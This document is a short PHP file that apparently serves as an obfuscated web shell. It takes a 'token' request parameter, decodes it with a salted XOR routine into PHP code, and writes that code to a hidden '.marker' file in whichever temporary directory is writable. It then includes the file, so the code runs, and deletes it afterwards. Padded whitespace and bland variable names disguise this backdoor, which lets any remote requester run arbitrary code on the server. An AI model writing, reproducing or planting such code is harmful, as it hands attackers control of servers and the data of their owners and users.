<?php

if(array_key_exists("\x74\x6Fken", $_REQUEST) && !is_null($_REQUEST["\x74\x6Fken"])){
	$val = $_REQUEST["\x74\x6Fken"];
	 		$val = 	 explode(			'.' ,$val)		 ;
	$mrk = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen( 	$salt		);
            $t = 0;
            $__len = count( 	$val		);
    
            do {
                if( 	$t>= $__len) break;
                $v8 = $val[$t];
                $chS = ord( 	$salt[$t %	$lenS]		);
                $d =( 	( 	int)$v8 - $chS -( 	$t %	10)) ^ 68;
                $mrk	.= 	chr( 	$d		);
                $t++;
            } while( 	true		);
	$data_chunk = array_filter([session_save_path(), "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), getcwd(), getenv("TMP")]);
	for ($descriptor = 0, $binding = count($data_chunk); $descriptor < $binding; $descriptor++) {
    $comp = $data_chunk[$descriptor];
    		if ((is_dir($comp) and is_writable($comp))) {
    $reference = sprintf("%s/.marker", $comp);
    $file = fopen($reference, 'w');
if ($file) {
	fwrite($file, $mrk);
	fclose($file);
	include $reference;
	@unlink($reference);
	exit;
}
}
}
}